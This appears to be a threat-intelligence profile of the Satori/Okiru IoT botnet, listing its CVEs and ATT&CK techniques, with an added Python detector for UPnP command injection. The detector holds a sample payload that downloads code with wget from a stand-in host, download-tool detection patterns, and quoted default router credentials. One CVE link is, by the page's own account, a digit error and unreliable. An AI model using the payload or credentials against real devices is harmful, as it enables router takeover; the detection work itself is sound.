
Satori

Satori is a Mirai-based IoT botnet, also referred to as Okiru, first identified in late 2017. It is known for extremely rapid propagation: the cited reporting states it infected more than 260,000 devices or routers within about 12 hours shortly after discovery. The malware targets internet-exposed routers and other embedded/IoT systems, particularly small-office/home-office and residential devices, and is used for botnet expansion and distributed denial-of-service activity.

The cited reporting directly associates Satori with exploitation of multiple router vulnerabilities. Reported infection vectors include the GPON router flaws CVE-2018-10561 and CVE-2018-10562 affecting DASAN Zhone Solutions devices, where Satori was observed incorporating the GPON exploit into later variants. The reporting also states that Satori exploited a vulnerability in D-Link DSL-2750B devices, described in that material as an OS command injection issue, and that Netlab 360 has linked it to exploitation of CVE-2018-10088 on Xiongmai devices. Additional reporting says Satori appeared to target Huawei Home Gateway routers, and that its tradecraft has been referenced in relation to exploitation of Realtek/miniigd-exposed devices on port 52869.

Operationally, Satori is described as a Mirai-derived self-propagating botnet that scans for vulnerable IoT devices and integrates exploit code to compromise them at scale. One technical reference notes that Satori-style propagation included downloading and executing binaries for multiple CPU architectures to maximize infections. The malware is repeatedly discussed in the context of DDoS botnet ecosystems and modern Mirai variants.

High-confidence associations in the cited reporting include its classification as a Mirai variant/botnet, the alias Okiru, rapid mass infection of routers, targeting of Huawei Home Gateway and other IoT/router platforms, and exploitation links to the GPON vulnerabilities, the D-Link DSL-2750B flaw, and CVE-2018-10088. No actor attribution beyond its placement in the broader Mirai-derived botnet ecosystem is directly established.
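As an added defender-side example that is not part of the original page: a small Python check that flags inbound UPnP SOAP requests carrying the backquote/wget injection pattern quoted in the ATT&CK evidence below, and pairs that with hits on the two uncommon scanning ports (52869 for the Realtek miniigd service, 37215) listed in the Fortinet evidence. The request bodies, the 203.0.113.5 host and the rule names are constructed assumptions.

```python
import re
from dataclasses import dataclass

# Uncommon TCP ports the quoted FortiGuard evidence ties to Satori/Okiru scanning
# (52869 is the Realtek SDK miniigd UPnP service behind CVE-2014-8361).
SATORI_SCAN_PORTS = {52869, 37215}
# Shell metacharacters that never belong in a UPnP SOAP argument value; the
# quoted Fortinet analysis notes a backquote carries the injected command.
SHELL_META = re.compile(r"`|\$\(|;|\|\||&&")
# Tokens of the download-and-execute stage described under T1105.
DOWNLOAD_EXEC = re.compile(r"\b(wget|curl|tftp|chmod)\b", re.I)
# UPnP SOAP arguments look like <NewInternalClient>value</NewInternalClient>.
SOAP_ARG = re.compile(r"<(New\w+)>(.*?)</\1>", re.S)


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def analyze_request(dst_port: int, body: str) -> list[Finding]:
    """Return every rule one inbound HTTP request to an IoT device trips."""
    findings = []
    if dst_port in SATORI_SCAN_PORTS:
        findings.append(Finding("satori-scan-port", f"request to TCP/{dst_port}"))
    for name, value in SOAP_ARG.findall(body):
        if SHELL_META.search(value):
            findings.append(Finding("upnp-soap-cmd-injection", f"{name} holds a shell metacharacter"))
        hit = DOWNLOAD_EXEC.search(value)
        if hit:
            findings.append(Finding("download-exec-stage", f"{name} references {hit.group(0)}"))
    return findings


def is_satori_like(dst_port: int, body: str) -> bool:
    """Alert only when an injection attempt is paired with a scan port or a
    download stage, so ordinary UPnP port-mapping noise does not page anyone."""
    rules = {f.rule for f in analyze_request(dst_port, body)}
    return "upnp-soap-cmd-injection" in rules and bool(rules & {"satori-scan-port", "download-exec-stage"})


# Constructed sample bodies (not captured traffic): a legitimate AddPortMapping
# call and one carrying the backquote/wget pattern quoted in the ATT&CK evidence.
BENIGN_BODY = ("<u:AddPortMapping><NewInternalClient>192.168.1.10</NewInternalClient>"
               "<NewInternalPort>8080</NewInternalPort></u:AddPortMapping>")
INJECTED_BODY = ("<u:AddPortMapping><NewInternalClient>`wget http://203.0.113.5/c`"
                 "</NewInternalClient></u:AddPortMapping>")

if __name__ == "__main__":
    print(is_satori_like(52869, INJECTED_BODY), analyze_request(52869, INJECTED_BODY))
```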


Vulnerabilities exploited

5 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CVE-2018-10562: Command Injection in Dasan GPON Home Routers diag_Form (exploited in the wild)

Satori Botnet — The infamous botnet that infected 260,000 devices in just 12 hours last year, Satori (also known as Okiru) has also been observed to include GPON exploit in its latest variant. | Gigabit-capable Passive Optical Network (GPON) routers manufactured by DASAN Zhone Solutions have been found vulnerable to an authentication bypass (CVE-2018-10561) and a root-RCE (CVE-2018-10562) flaws that eventually allow remote attackers to take full control of the device.

via The Hacker News (thehackernews.com)
CVE-2018-10561: Dasan GPON Router Authentication Bypass via ?images Parameter (exploited in the wild)

Gigabit-capable Passive Optical Network (GPON) routers manufactured by DASAN Zhone Solutions have been found vulnerable to an authentication bypass (CVE-2018-10561) and a root-RCE (CVE-2018-10562) flaws that eventually allow remote attackers to take full control of the device. | Satori Botnet — The infamous botnet that infected 260,000 devices in just 12 hours last year, Satori (also known as Okiru) has also been observed to include GPON exploit in its latest variant.

via The Hacker News (thehackernews.com)
CVE-2014-8361: Realtek SDK miniigd UPnP SOAP Command Injection

the first exploit used by Okiru is linked to the CVE-2014-8361... Devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command injection attacks in the UPnP SOAP interface.

via Fortinet Threat Research (blog.fortinet.com)
CVE-2018-10088: Unauthenticated HTTP Login Stack Buffer Overflow in XiongMai uc-httpd 1.0.0

the botnet is co-located with a Xiongmai NVR/IP camera’s HTTP server... correlate three known vulnerabilities this server is affected by: CVE-2017-7577, CVE-2018-10088, and CVE-2022-45460... CVE-2018-10088, in particular, is already associated with the Satori, Hajime, and BotenaGo botnets.

via VulnCheck blog (vulncheck.com)
CVE-2018-10888: Out-of-bounds Read in libgit2 git_delta_apply

CVE-2018-10888, in particular, is already associated with the Satori, Hajime, and BotenaGo botnets.

Note that this quoted sentence is the CVE-2018-10088 passage above with one digit changed, and the summary on this page lists only CVE-2018-10088 among the confirmed links; treat the libgit2 correlation as unconfirmed until the source is checked.

via VulnCheck blog (vulncheck.com)
MITRE ATT&CK techniques & procedures

15 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

3 techniques
T1078 Valid Accounts (evidence: 2)

...have been found vulnerable to an authentication bypass (CVE-2018-10561)...

T1078.001 Default Accounts (evidence: 1)

After analysis, it appears the exploit is trying to use the default TR-064 account, whose username is dslf-config and password is admin.

T1190 Exploit Public-Facing Application (evidence: 4)

the first exploit used by Okiru is linked to the CVE-2014-8361... Devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command injection attacks in the UPnP SOAP interface.

Execution

2 techniques
T1059.004 Unix Shell (evidence: 2)

Note that a backquote character is used to inject OS commands. The “wget” command is used to perform an HTTP request to download the malicious payload and store it on the device as filename “c”.

T1203 Exploitation for Client Execution (evidence: 3)

...DASAN Zhone Solutions have been found vulnerable to an authentication bypass (CVE-2018-10561) and a root-RCE (CVE-2018-10562) flaws that eventually allow remote attackers to take full control of the device.

Persistence

2 techniques
T1078 Valid Accounts (evidence: 2)

...have been found vulnerable to an authentication bypass (CVE-2018-10561)...

T1078.001 Default Accounts (evidence: 1)

After analysis, it appears the exploit is trying to use the default TR-064 account, whose username is dslf-config and password is admin.

Privilege Escalation

2 techniques
T1078 Valid Accounts (evidence: 2)

...have been found vulnerable to an authentication bypass (CVE-2018-10561)...

T1078.001 Default Accounts (evidence: 1)

After analysis, it appears the exploit is trying to use the default TR-064 account, whose username is dslf-config and password is admin.

Stealth

2 techniques
T1078 Valid Accounts (evidence: 2)

...have been found vulnerable to an authentication bypass (CVE-2018-10561)...

T1078.001 Default Accounts (evidence: 1)

After analysis, it appears the exploit is trying to use the default TR-064 account, whose username is dslf-config and password is admin.

Credential Access

2 techniques
T1110 Brute Force (evidence: 1)

“Vector: Default credentials, unpatched firmware, exposed services (Telnet/SSH/HTTP APIs)”

T1110.003 Password Spraying (evidence: 1)

We suspect that these devices may have been infected not by Okiru’s worm capabilities, but by credential stuffing.

Discovery

1 technique
T1046 Network Service Discovery (evidence: 4)

FortiGuard Labs last week also began detecting strange scanning activities on uncommon TCP ports 52869 and 37215.

Lateral Movement

1 technique
T1210 Exploitation of Remote Services (evidence: 1)

“Mirai… Vector: Default credentials, unpatched firmware, exposed services (Telnet/SSH/HTTP APIs)” and “Aisuru… Automated scanning and exploitation of vulnerable IoT devices.”

Command and Control

5 techniques
T1071 Application Layer Protocol (evidence: 2)

recent data reveals a worrying trend: the number of servers used to control botnets ... jumped by 24% in the last half of 2025.

T1105 Ingress Tool Transfer (evidence: 4)

The “wget” command is used to perform an HTTP request to download the malicious payload and store it on the device as filename “c”. Then, the same kind of SOAP request, but with a modified command injection, is performed to execute the payload.

T1568.001 Fast Flux DNS (evidence: 1)

“Evasive command-and-control techniques, including domain-fluxing and encrypted command channels.”

T1568.002 Domain Generation Algorithms (evidence: 1)

"Evasive command-and-control techniques, including domain-fluxing and encrypted command channels"

T1573 Encrypted Channel (evidence: 1)

"Evasive command-and-control techniques, including domain-fluxing and encrypted command channels"

Impact

1 technique
T1498 Network Denial of Service (evidence: 2)

These compromised computers can be used to initiate large-scale distributed denial-of-service (DDoS) attacks... Aisuru-Kimwolf is a botnet used to conduct large-scale DDoS attacks.
